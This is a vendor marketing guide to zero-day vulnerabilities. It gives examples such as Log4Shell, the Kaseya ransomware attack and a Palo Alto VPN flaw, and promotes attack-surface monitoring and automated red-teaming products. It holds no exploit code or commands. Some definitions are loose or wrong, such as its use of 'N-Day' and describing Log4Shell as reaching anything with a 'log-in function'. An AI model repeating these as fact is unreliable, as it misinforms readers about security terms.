THE ULTIMATE GUIDE TO
All you need to know about zero-day exploits and the crucial role they play in security.
All you need to know about zero-day exploits and the crucial role they play in security.
A zero-day is a previously unknown and unexploited vulnerability. That means there are no patches for it, and security teams have zero-days to develop a patch or plan remediation. If a zero-day is exploited by threat actors, they can cause serious damage while undetected. And even after they’re detected, they can continue to wreak havoc while security teams scramble to find a way to remediate the issue.
Discovering a zero-day vulnerability requires expert hacking ability and creative tactics. Because of the skill and resources involved, petty criminals usually won’t bother to look for zero-days and will go after known vulnerabilities. Most zero-days are discovered by vendors, security researchers or advanced adversaries.
Zero-day vulnerabilities are valuable entry ways for espionage because hackers can get in undetected. Nation-states have government sponsored programs with dedicated resources to find and exploit zero-days. For example, the Chinese-sponsored group Hafnium took advantage of several zero-day vulnerabilities to attack Microsoft Exchange email servers.
Professional hackers with extensive resources put concentrated efforts into finding zero-days to conduct attacks on enterprises’ most valuable data and processes. Selling zero-days to other hackers is also a lucrative business as they command prices of over $1 million.
Not everyone looking for zero-days seeks to misuse them. Software vendors also seek to discover these new vulnerabilities themselves, before the attackers do to ensure the security of their products.
Other white hat actors on the hunt for zero-days include security researchers and vendors. Cybersecurity solutions vendors need to think like attackers do in order to find the latest vulnerabilities and prevent attacks. Although the number of zero-days found this year is higher than ever before, many of them were discovered by those on the right side of the law.
Because of the serious impact zero-days can cause, it’s crucial for security leaders to plan for them and build security programs resilient to zero-day attacks.
A zero-day attack won’t be found by any vulnerability scanner because it’s unknown. That means attackers can exploit the vulnerability without fear of losing access in the future. They provide a back-door into corporate networks. While often viewed as “undetectable” zero-days are just an entry into a system. The actions taken by threat actors after a vulnerability is used, however, are often the same as those used for known vulnerabilities, so it is possible to detect zero-day attacks.
By definition, a zero-day has no known patches. No one knew about the vulnerability and thus, had no reason to develop a patch for it. Once it’s discovered, security teams need to scramble to apply patches, but this requires time and resources. If a zero-day is disclosed publicly but no patch is available, it is called an N-Day.
In the event of a zero-day attack, the pressure is on security teams to be able to detect, respond and contain the threat before it spreads. If allowed to spread throughout a network undetected, like any breach, the cost of remediation is high. Tracking down and repairing the damage caused by breach requires system downtime and hundreds of man-hours. If attackers have accessed confidential information, enterprises may find themselves in breach of SLAs or data protection regulations and have to pay fines. This also impacts the enterprise’s reputation, which in turn leads to lost business. Successfully defending against zero-days requires teams to have robust and highly effective detection and incident response processes in-place, capable of detecting signs of a zero-day attack.
One recent high profile zero-day is the Apache log4j 2 vulnerability known as Log4Shell; it’s critical both because of its potential and its reach. It can use multiple attack vectors, everything that has some kind of log-in function, from HTTP requests to email to text messages. If exploited, attackers can take control of a system, executing code remotely.
Log4j is part of a library that’s used throughout Java software, and with 2.5 billion devices using Java, nearly anyone can be affected. Because the vulnerability is so easy to exploit, it’s a prime target for ransomware threat actors. Randori Attack has tested the exploit and proven potential for its use to aid enterprises in quickly combatting the danger.
One of the most recent high profile zero-day attacks targeted Kaseya VSA software, used by thousands of managed service providers worldwide. The Russian ransomware-as-a-service gang Revil found and exploited multiple zero-day vulnerabilities in the system. As a result of this, 1500 companies had their systems compromised by ransomware, which was packaged as a fake software update.
The attack caused serious supply chain disruptions as critical systems were encrypted by ransomware. Even those unaffected experienced disruption due to downtime. When the vulnerability was made known, Kaseya asked all customers to shut down their VSA servers until a patch was available. Kaseya responded quickly to the attack, working with global experts to develop a remediation plan in just a few days. But even the best efforts couldn’t prevent the damage that was done.
Since millions of remote workers began relying on Zoom during the pandemic, multiple zero-day vulnerabilities have been discovered. In March 2020, two zero-days were discovered, one of which allowed hackers to access Zoom’s microphone and camera features, spy on and even record meetings and send malicious code through chats.
In July 2020, one was reported by an anonymous security researcher. This vulnerability affected all users with Windows 7 or earlier. While this vulnerability was fortunately discovered before it was exploited, it would have allowed hackers to remotely execute code without any security warnings. Zoom developed a patch, but there was still some risk to users with older Windows systems.
Because of the serious impact of zero-days, security vendors aim to find them before attackers do so that their customers have full protection. In November of this year, Randori disclosed a serious zero-day vulnerability in the Palo Alto Network VPN. Rated a 9.8 on the CVSS score, this memory corruption vulnerability would have allowed attackers to execute arbitrary code and disrupt system processes.
We found the vulnerability and tested its exploitability with Randori Attack continuous automated red teaming (CART), and then disclosed it to Palo Alto. Palo Alto quickly developed an update with a patch for the affected versions. Because of Randori’s close collaboration with Palo Alto Networks, the vulnerability was not exploited in the wild.
How can you discover or prevent zero-days before attackers have the chance to exploit them? It’s important to be vigilant and take advantage of the latest solutions.
Your attack surface, everything on your system that’s exposed to the internet, is constantly expanding. That means more opportunities for unknown vulnerabilities to develop. To keep up, it’s worth investing in an attack surface management (ASM) solution. ASM continuously monitors your attack surface, discovering misconfigurations and assets that security teams were unaware of, like shadow IT.
When you’re aware of everything on your attack surface, you can take steps to protect your most valuable assets. A good ASM solution will not only let you know about vulnerabilities, but will also prioritize risk, so that security teams make the most efficient use of their time.
Red-teaming tests your system against real-world threats. This can be done either in-house or by hiring red team services. With red team exercises, security professionals put your system to the test by using techniques that hackers currently use. A skilled red team will not only try to break in through known vulnerabilities, but also think outside the box to discover completely unknown, zero-day vulnerabilities.
If a red team is unable to hack into your system, you can be fairly confident you’re secure on that day, but it’s a point in time exercise. Red team services are costly, and some systems may also have to be down while testing is carried out, so you can’t do this all the time.
Continuous automated red teaming (CART) is an automated solution that has a similar role to a red team. The advantage is that it can run all the time, rather than being a periodic event. It’s programmed with the techniques hackers use, and it constantly attacks authorized systems. If a breach is possible, security teams will be notified. CART ensures that your defenses are always ready and gives teams time to develop remediation before an actual attack occurs. Leading CART solutions are equipped with the ability to discover zero-day vulnerabilities.
To avoid being caught unawares by zero-days, you need a solution that uses authentic techniques. Let’s look at the key requirements for a solution to help you find and prevent zero-days.
The best solutions will use a blackbox discovery method. That means they’re starting from the same place that hackers do, with nothing more than an email address. There shouldn’t be any complex installation required.
It’s key for a security solution to have a genuine attacker’s perspective, to reveal the most tempting exposed assets on your system along with the most likely potential exploits. A combined solution is ideal, one that can uncover the unknowns on your attack surface and test your defenses to keep them sharp.
An ideal solution should have nation-state level discovery capabilities and leverage the latest techniques that hackers are exploiting in the wild. If it’s not at the level of real-world attackers, you won’t be fully protected.
It should have a demonstrated record of zero-day discoveries. Most solutions can identify known vulnerabilities and rank them according to the CVSS scale. But few have the ability to find zero-days and make them known before outside hackers discover them.
Because new threats are emerging all the time, continuous monitoring of your attack is essential. That way, you’ll be able to prepare your defense before an attack occurs.
A zero-day exploit is one of the most serious attacks because it could be ongoing for some time before you even know about it, and there’s no known way to patch it. The consequences may cost millions.
To prevent zero-day attacks, you need to take a proactive approach by constantly monitoring your attack surface with a solution that’s equipped with advanced threat discovery techniques.
Randori Recon is the industry’s leading ASM software, the only ASM platform that brings a hacker’s perspective to your attack surface. Randori has a proven record of discovering zero-days.
With advanced reconnaissance techniques used by real threat actors, it gives you the power to identify, prioritize, and continuously monitor your most valuable exposed assets and risks so you can stay a step ahead of the attackers.
You also want to be able to test whether your system can withstand attacks. With a CART solution, you can constantly subject your system to authentic attacks to ensure your defenses are strong.
Eliminate guesswork for your team and obtain proof of what happens when a weakness is left unaddressed. Gain certainty of the highest risks and their potential consequences.
Are you ready to discover your attack surface and test your defenses? Try a demo of Randori Platform, including Randori Recon and Randori Attack, today.
And ensure you’re protected from zero-day exploits.